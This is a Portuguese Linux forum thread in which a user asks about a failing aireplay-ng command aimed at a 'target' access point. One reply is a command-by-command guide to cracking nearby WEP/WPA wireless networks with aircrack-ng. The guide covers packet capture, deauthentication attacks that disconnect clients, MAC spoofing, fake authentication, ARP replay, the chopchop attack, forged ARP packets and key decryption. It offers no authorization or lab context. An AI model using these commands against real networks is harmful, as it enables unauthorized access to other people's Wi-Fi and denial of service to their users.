Dúvida a respeito de um comando no aircrack [RESOLVIDO]

1. Dúvida a respeito de um comando no aircrack [RESOLVIDO]

Thiago
davemport

(usa openSUSE)

Enviado em 07/11/2011 - 10:47h

Bom dia!

( =

Guys, depois de ter instalado corretamente o aircrack no OpenSuse 11.4 e seguido vários comandos tive uma dúvida. Deixe-me explicar desde o inicio:

Abrindo terminal
Modo root
- su

- iwlist scanning ( para fazer uma busca das resdes wlan por perto, ver canal e SSID
* Feito isso Verifico o mac da minha placa wireless
- export AP="mac do ap alvo"
- export WIFI="meu mac"
*até ai beleza sem nenhum problema
*Agora começa...
- aireplay-ng --fakeauth 0 -e "SSID" -a SAP -h SWIFI wlan
*Nessa parte da uma msg de invalid mac address.
Com toda a certeza stou fazendo algo errado, alguém poderia me instruir o caminho, só para que eu possa continuar a caminhada.

Obrigado mais uma vez à todos pelo seu tempo.


  


2. Hmm..

Thiago
davemport

(usa openSUSE)

Enviado em 29/11/2011 - 13:46h

Alguém...? ( =


3. Re: Dúvida a respeito de um comando no aircrack [RESOLVIDO]

Fábio do Nascimento Lima
fabio.adsistema

(usa openSUSE)

Enviado em 05/12/2011 - 00:11h

Olá amigo

como vc fez pra instalar o aircrack-ng no suse??
tem como vc passar corretamente as informações pq estou tendo dificuldades.

Grato!!


4. Opa!

Thiago
davemport

(usa openSUSE)

Enviado em 11/12/2011 - 08:55h

Cara, desculpa a demora em responder! Sem tempo mesmo.
Enfim, tive alguns problemas com a distro. Não é má vontade, hahaha! Vou te contar, trabalho numa empresa de informática e levei meu note pra baixar a versão nova do suse e instalar, visto que dia de sábado é sussa e eu não tenho net em casa. Deixei meu note lá e fui fazer um trabalho externo. Quando eu cheguei confundiram meu note pra formatar com outro lá... Nem te falo, cheguei e estava rodando o ruindows 7... Perdi meus links salvos e arquivos... Comprei a pouco um modem da operadora vivo. Por isso estou te respondendo hoje. Vou ver se encontro as coisas que usei para instalar o aircrack e te passo, vai demorar um pouco. Pois, estou pegando mó rabo no suse 12.1! Abraços, assim que estiver tudo redondinho eu volto e te ajudo.


5. aircrack

Davi lima
verdinho

(usa Debian)

Enviado em 12/12/2011 - 20:30h

Amigo !!! vou simplificar pra vc!! depois que vc instala o programa existem varias formas de acessar a as redes, correto? a forma mais simples que eu acho e a seguinte: desculpe vou fazer o seguinte vc responder sua pergunta e a pergunta do amigo fabio.adsistema ok!! vamos la!!

Primeiro passo Instalar o aircrack.

Pra quem tem o yumex e so digitar o nome aircrack na barra de pesquisa e marcar todos os itens localizados ou:

yum install aircrack -y ou apt-get install aircrack -y dependendo da sua distribuição linux.

se seu sistema estiver atualizado ele ira instalar todos os pacotes necessários para fazer seu aircrack-ng funcionar!! ele ira instalar os seguintes pacotes:

AIRMON-NG (vem instalado com o aircrack-ng):

Esta é a ferramenta para colocarmos nossa placa de rede wireless no estado monitor! Devemos fazer isso antes de começar a capturar pacotes da rede wireless.

Façamos o seguinte comando como root ou administrador:

airmon-ng <start|stop> <interface> [channel]

Onde:

<start|stop> inicia ou para de monitorar;
<interface> sua interface de rede ex.: ethX, rawX, athX, etc;
[channel] é o canal que sua placa de rede wireless irá trabalhar

Captura de pacotes
Pronto, agora com sua placa de rede monitorando a rede wireless presente por perto, vamos para uma parte importante de quebra de rede wireless... a captura dos pacotes transmitidos pelo protocolo 802.11! Usaremos a seguinte ferramenta que também vem com aircrack-ng, que se chama:

AIRODUMP-NG

Sua principal finalidade é capturar e coletar ivs (Initialization Vectors) dos pacotes WEP, para que após coletados usaremos a ferramenta chamada aircrack-ng para sabermos qual chave esse pacote WEP que capturamos está usando.

Usando o airodump-ng como root:

airodump-ng <options> <interfaces>

<interfaces> - interfaces da sua placa de rede (ethX, athX, rawX, wifiX, etc)


Suas <options> são:

-ivs: Somente capturar ivs;
--gpsd: Usar um dispositivo GPS, caso tenha;
--write: Cria um arquivo com o nome escolhido e com a extensão (*.cap ou *.ivs) e começa a capturar;
-w: É o mesmo que --write;
--beacons: Guarda os beacons (não é guardado por padrão);
--channel ou -c: Especifica um canal para a captura;
-a: Captura na frequência de 5Ghz específica da banda A;
--abg: Captura tanto em frequências de 2,4Ghz como em 5 Ghz.


Bom, por padrão o airodump-ng captura pacotes dentro dos canais que se encontram na frequência de 2.4GHz.

Capturando e escrevendo no arquivo teste.ivs, no canal 11, nas frequências entre 2.4 à 5 GHz e com a interface da placa de rede wireless:

# airodump-ng --ivs -w teste.ivs -c 11 -abg ath0

Captura de pacotes com arquivo teste.cap, no canal 11, nas frequências entre 2.4 à 5 GHz e com a interface da placa de rede wireless:

# airodump-ng -w teste.cap -c 11 -abg ath0

O programa airodump-ng oscila entre WEP e WAP, quando o sua placa não rejeita pacotes corrompidos. O airodump-ng irá mostra isso no terminal:

http://img.vivaolinux.com.br/imagens/artigos/comunidade/thumb_captura0xn.jpg

http://img.vivaolinux.com.br/imagens/artigos/comunidade/thumb_airodump21oc.jpg

Atacando a rede wireless
Depois de capturados o pacotes da rede, vamos ver agora como atacar a rede wireless com a seguinte ferramenta, que também vem com o aircrack-ng.

AIREPLAY-NG:

Há cinco maneiras diferentes de atacar com o aireplay-ng, o programa aireplay-ng classifica da seguinte maneira:

0: Desautenticação;
1: Autentificação falsa;
2: Seleção interativa do pacote a enviar;
3: Reinjeção de requisição ARP;
4: O chamado "chopchop" de KoreK (predicção de CRC), pois ele utiliza essa classificação como referência para o ataque!


Ataque zero
Faz com que o usuário conectado ao AP (Access Point) desautentique e volte a conectar, fazendo assim que ele faça uma nova requisição ARP e enviar um novo handshake. Neste ataque podemos utilizar várias maneiras:

Capturar Handshake WPA:

# aireplay-ng -0 5 -a MACdoAP -c MAC do Client <interface>

Reinjeção ARP (ataque 3):

# aireplay-ng -0 10 -a MACdoAP <interface>

(faz todos os usuários conectados ao AP caírem para nova requisição ARP)

# aireplay-ng -3 -b MACdoAP -h MAC do Client <interface>

(reinjeção dos pacotes obtidos)

Rejeitar que o cliente se conecte:

# aireplay-ng -0 0 -a MACdoAP <interface>

(todos os clientes conectados ao AP)

# aireplay-ng -0 0 -a MACdoAP -c MACdoCliente <interface>

(somente um cliente)

Ataque um
Este ataque funciona com êxito quando temos um cliente conectado ao AP, caso não tenha, faremos uma cliente para conectar a esse AP. Mas lembre-se, é melhor quando temos uma cliente conectado ao AP, pois assim geraremos tráfego ARP.

Vamos mudar o nosso MAC:

# ifconfig <interface> down
# ifconfig <interface> hw ether 00:11:22:33:44:55
# ifconfig <interface> up

Agora vamos atacar:

# aireplay-ng -1 0 -e SeuESSID -a MACdoAP -h 00:11:22:33:44:55 <interface>

Se der certo aparecerá algo assim:

12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

Como alguns APs podem requerer autenticação de tantos em tantos segundos, o aireplay-ng consegue fazer isso da seguinte maneira:

# aireplay-ng -1 <QntdeSegundos> -e SeuESSIDFalso -a MACdoAP -h 00:11:22:33:44:55 <interface>

Caso este ataque não seja bem sucedido (aireplay continua enviando pacotes de pedido de autenticação), pode ser que esteja usando filtro de MAC Address. Verifique o seguinte também:

Está com o controlador corretamente instalado e com os patches devidamente aplicados.

A placa wireless está configurada no mesmo canal que o Access Point.

O BSSID e o ESSID (opções -a / -e) são as corretas. Se for Prism2, verifique se o firmware está atualizado.

Algumas placas de rede só suportam associar e injetar/monitorar através da interface <interface>Xraw, por isso talvez você precise fazer:

# ifconfig <interface> down hw ether 00:11:22:33:44:55
# iwconfig <interface> mode Managed essid 'the ssid' key AAAAAAAAAA
# ifconfig <interface> up

# sysctl -w dev.<interface>.rawdev=1 (Cria o <interface>Xraw)
# ifconfig <interface>raw up
# airodump-ng <interface>raw out 6

Então você poderá usar os ATAQUES 3 e 4 (o aireplay-ng substitui o <interface> pela <interface>raw que criamos caso sua placa precise).

# aireplay-ng -3 -h 00:11:22:33:44:55 -b MACdoAP <interface> (ATAQUE 3)
# aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 <interface> (ATAQUE 4)


Ele pode selecionar um pacote qualquer e enviá-lo...

# aireplay-ng -2 -b MACdoAP -n 100 -p 0841 -h MACdoClient -c MACdoAP <interface>

hehehehe =D

Ataque três
Ataque de reinjeção de requisição ARP é o mais efetivo para gerar IVs. Este ataque requer um MAC de um cliente associado ou um MAC falso como montamos no ATAQUE 1! Este ataque pode demorar um pouco até que apareça a requisição ARP, ele falhará rapidamente se não houver tráfego.

Como usamos no ATAQUE 1:

# aireplay-ng -3 -h 00:11:22:33:44:55 -b MACdoAP <interface>

Aparecerá o seguinte:

Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

Ataque quatro
Ataque nomeado de "chopchop" de KoreK, este ataque é ótimo quando bem sucedido, pois ele desencripta um pacote WEP sem conhecer a sua chave e também pode usar uma WEP dinâmica.

Pelo o que eu li esse ataque não recupera a chave WEP, ele só revela em texto plano. Alguns APs não são tão vulneráveis assim. Outros parecem até demais (vulneráveis) pelo fato fato de jogarem os pacotes menores que 60 bytes.

O aireplay-ng consegue adivinhar o resto pacotes, que são menores que 42 bytes, que são jogados pelos APs, assim que o header tornar-se predictível.

Primeiro, decriptamos um pacote:

# aireplay-ng -4 <interface>

Se não funcionar é porque o AP precisa de um MAC específico filtrado neste AP. Assim, termos que usar um MAC de um cliente está conectado no AP:

# aireplay-ng -4 -h MACdoCLiente <interface>

Segundo olharemos o IP:

# tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap

Aparecerá algo assim:

reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

Agora, forjamos uma requisição ARP:

# arpforge-ng replay_dec-0627-022301.xor 1 MACdoCliente MACdoAP 192.168.1.100 192.168.1.2 arp.cap

A faixa de IP inicial (192.168.1.100) não importa, mas sim a de destino (192.168.1.2).

Reenviando o ARP forjado:

# aireplay-ng -2 -r arp.cap ath0


Decriptando as chaves dos pacotes capturados... (FIM)
Vamos utilizar a ferramenta:

AIRDECAP-NG

Serve para decriptar a chave WEP/WPA1 que foi capturada no arquivo.cap.

airdecap-ng [opções]

As opções:

http://img.vivaolinux.com.br/imagens/artigos/comunidade/airdecap9wb.jpg

Segue o exemplo:

# airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap
# airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
# airdecap-ng -e 'the ssid' -p passphrase tkip.cap








Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts